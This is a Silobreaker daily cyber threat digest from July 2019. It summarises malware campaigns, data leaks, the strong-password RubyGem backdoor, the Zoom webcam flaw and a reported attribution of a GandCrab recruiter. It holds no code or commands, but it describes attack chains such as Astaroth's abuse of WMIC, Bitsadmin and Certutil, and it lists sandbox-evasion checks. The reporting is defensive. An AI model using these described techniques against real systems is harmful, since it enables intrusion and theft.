Threat Reports

Silobreaker Daily Cyber Digest – 09 July 2019



New campaign delivers RMS RAT alongside Dridex banking malware

  • Cofense researchers discovered a new email campaign impersonating eFax that appears to contain a Microsoft Word attachment. The attachment is actually a ZIP archive containing a XLS Microsoft Excel spreadsheet that includes an Office macro.
  • Enabling the Office macro causes Dridex banking malware and RMS RAT to be downloaded on to the target’s device. RMS RAT allows a malicious actor to log keystrokes, record from the webcam and microphone, transfer files, manipulate Windows Task Manager, and more.
  • Dridex is calibrated to target a wide range of sites, when the target visits these sites the malware injects a script into the browser. This allows an attacker to steal entered information, redirect traffic, bypass multi-factor authentication, and more.

Source (Includes IOCs)


Fileless attack chain used to deliver Astaroth backdoor

  • The Microsoft Defender ATP Research Team discovered the attack being disseminated by spear-phishing emails that contain a LNK file. When opened the LNK file executes the WMIC tool with the ‘Format’ parameter. This causes the download and execution of a JavaScript code which proceeds to abuse the Bitsadmin tool to download payloads encoded in Base64 and decoded using the Certutil tool.
  • The Regsvr32 tool is then utilised to decoded DLLs which decrypt and load additional files until the Astaroth backdoor is eventually injected into the Userinit process. The researchers stressed that the attack chain only uses legitimate system tools that are already present on the targeted device, which helps obfuscate the attack.
  • Astaroth malware is used to steal information and can exfiltrates users’ credentials, keystrokes, and more.

Source (Includes IOCs)


South Korean users targeted with specially customised GoBot2 variant

  • Researchers at ESET discovered the new malware variant, named GoBotKR malware being spread via South Korean and Chinese torrent sites that host Korean movies, TV shows, and games. The researchers detected that the malware has been active since March 2018, with 80% of infections occurring in South Korea.
  • GoBotKR malware is written in Golang and is a variant of GoBot2 malware. The threat actors behind GotBotKR are using the malware to build a botnet that can be used in DDoS attacks. During the infection process GoBotKR relays material to the C2 which includes system information, network configuration, OS version information, a list of installed antivirus protection, and more.
  • In addition to normal GoBot2 features, GoBotKR contains modifications specifically designed for use in South Korea. Such techniques include scanning for the URLs of South Korean platforms Naver and Daum to determine IP addresses, and scanning for South Korean security software designed by AhnLab.

Source (Includes IOCs)


Over 17,000 new samples of Anubis malware discovered

  • Anubis malware, originally used for cyberespionage, has been retooled multiple times, for example as a banking malware or ransomware. Whilst researching Anubis’ activities, researchers at Trend Micro came across two related servers that contained 17,490 samples of the malware targeting a total of 188 banking and finance related apps, mainly in European countries, Turkey, Australia, the US and India. 
  •  In January 2019, Trend Micro observed Anubis stealing personally identifiable information by making use of motion-based sensors to elude sandbox analysis and overlays, a method that is also used in these new variants.
  • The researchers also discovered that the operators have been using social media platforms and Google short links to send commands since 2014, with one of the account’s registration date suggesting the attacker has most likely been active for about twelve years.

Source (Includes IOCs)


Ongoing Campaigns

Zeus Panda observed employing new tactic targeting wealthy victims

  • Zeus Panda is a banking trojan known for targeting Italian users that loads webinjects when a victim visits and successfully logs into their online banking accounts.
  • Security researchers at Cofense recently detected the employment of a new tactic, in which the malware is also able to access accounts with multi-factor authentication enabled. Once the funds have been transferred, the malware hides any evidence of the transaction, ensuring that affluent victims are less likely to notice.

Source (Includes IOCs)


Phishing campaign mimics Italian manufacturer to deliver highly evasive malware

  • Researchers at Yoroi analysed the campaign which used an ISO file attachment to deliver an encrypted Delphi packer. Researchers stressed the evasive nature of the malware as evident by the ‘huge number’ of checks that it runs to determine if it is running in a lab environment or virtual machine.
  • These evasion techniques included running debugger checks, monitoring cursor movement, checking for words like ‘sandbox’, ‘malware’ and ‘sample’, and running CPUID instructions to try and obtain information about the processor and its features.
  • If all these checks are passed the packer delivers the XpertRAT Malware which has capabilities such as keylogging, information exfiltration, command execution, and more.



Hacker Groups

Researcher investigates criminals behind GandCrab ransomware

  • Brian Krebs suggested that he had identified a Russian man who appears to have been in charge of recruiting new members to the GandCrab malware development team.
  • Krebs linked the highly rated Exploit forum user ‘Oneiillk2’ with an email address which had been used to register domains and sign up for accounts on the Russian social network Vkontakte. The researcher also found the email address linked to a phone number and a password which used a date of birth format.
  • The Vkontakte profile belonged to a Russian individual named ‘Igor Vladimirovich Prokopenko’. Using Russian citizenship records the researcher also  discovered that the date of birth password matched Mr Prokopenko’s date of birth. Krebs reached out to Mr Prokopenko who declined multiple requests for comment.

Source  (Includes IOCs)


Leaks and Breaches

Ontario municipality The Nation hit by ransomware attack

  • The municipality was hit with a ransomware attack on June 30th, 2019, that affected some of its services. Hackers are said to have demanded between $7,000 and $10,000 worth of Bitcoin, which the municipality refused to pay. All services apart from the municipality’s email service have been restored.



Jiangsu Provincial Public Security Department leaks over 90 records

  • Security researcher Sanyam Jain discovered the data on two unsecured Elasticsearch servers.  The database contained 58,364,777 citizen records and 33,708,010 business records.
  • Accessible personal information included names, genders and identity card numbers. Business records included business types, location coordinates and memos designed to track if the owner of the business is known.
  • Moreover, the servers also contained a Public Security Network admin console protected by a user/password combination and a publicly accessible Kibana installation. An intruder could have utilised these tools to browse and analyse the exposed data.



GE Aviation data exposed by DNS misconfiguration on open Jenkins server

  • Security researcher Bob Diachenko found a publicly exposed Jenkins server containing GE Aviation information such as source code, plaintext passwords, configuration details and private keys.
  • Diachenko reported the issue to GE Aviation who pulled the Jenkins server offline and stated that the information was exposed due to a DNS misconfiguration.



Data leak detected in Fieldwork’s software database

  • Cybersecurity researchers Noam Rotem and Ran Locar discovered a leak in a database belonging to Fieldwork, a business managing platform. The breach was resolved shortly after detection.
  • A significant amount of exposed data was found, including customer names, addresses, phone numbers, email addresses, alarm codes, full credit card details, and more.
  • Most notably, an auto-login link giving direct access to a company’s backend system was also found, exposing sensitive client information and a large amount of the company’s administrative infrastructure.




Critical vulnerabilities found in Huawei’s web applications and servers

  • Security researchers at Swascan discovered multiple vulnerabilities within Huawei’s web applications ranked as critical that, if exploited, could impact ‘business continuity, user’s data, and information security and the regular operation of their services.’
  • The flaws belong to three CWE categories, namely CWE-119, CWE-125 and CWE-78.



Researchers analyse 12 critical vulnerabilities in industrial control system (ICS) products

  • Tenable Research detail fifteen vulnerabilities the team found in the past nine months, twelve of which are classed as critical. The researchers suggest this indicates a lack of security standards in modern SCADA software.
  • The affected products are the Siemens TIA Portal, Fuji Electric TELLUS and V-Server, Schneider Electric InduSoft Web Studio and Modicon PLC, and Rockwell Automation RSLinx.
  • The researchers also offer a case study, in which they simulate an ICS attack on a nuclear power plant, demonstrating the impact such vulnerabilities could have on critical infrastructure systems.



RubyGem ‘strong password’ library contains backdoor 

  • Developer Tute Costa found that the ‘strong password’ v.0.07 Ruby library had been taken over by a malicious actor.  The hacker added code capable of downloading a payload from Pastebin which created a backdoor in websites and apps that used the ‘strong-password’ library.
  • Sites that were infected had their URL sent to the attackers address to await further instructions via cookie files. These were than unpacked and run through an execute function, granting the hacker the ability to run code inside an app with the backdoor.
  • Costa notified the RubyGems security team who then secured the library.   The vulnerability is being tracked as CVE-2019-13354.

Source 1  Source 2 (Includes IOCs) 


Unpatched Zero-Day vulnerability in Mac Zoom Client 

  • A vulnerability in Mac Zoom Client, tracked as CVE-2019–13450, continues to allow malicious websites to access and enable the camera on a user’s device without permission due to a ‘quick-fix’ solution.
  • Security researcher Jonathan Leitschuh first contacted Zoom Video Communications about two vulnerabilities on March 8th, 2019, with the company releasing the patch on June 24th, 2019 with version 4.4.2. CVE-2019–13449, which has been successfully patched in version 4.4.2, would have allowed an attacker to perform a Denial-of-Service attack. The patch did not fix the webcam vulnerability, as it can be easily bypassed according to Leitschuh.
  • Moreover, Leitschuh revealed that after uninstalling Zoom from a device, the localhost web server remains present, allowing it to reinstall the application without user authentication. 



The Silobreaker Team Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.

More News

  • Threat Summary: 11 – 17 October 2019

    11 – 17 October 2019 Silobreaker’s Weekly Cyber Digest is a quantitative summary of our threat reports, published every Thursday. The reports are created...
  • Silobreaker Daily Cyber Digest – 17 October 2019

      Malware Graboid cryptojacking worm spreads between unsecured Docker hosts Researchers at Unit 42 identified a new cryptojacking worm, dubbed Graboid, that has infected...
  • Silobreaker Daily Cyber Digest – 16 October 2019

      Malware  Researchers publish analysis of LOWKEY malware FireEye researchers analysed LOWKEY malware, a backdoor that has been observed being used in highly targeted...
View all News

Request a demo

Get in touch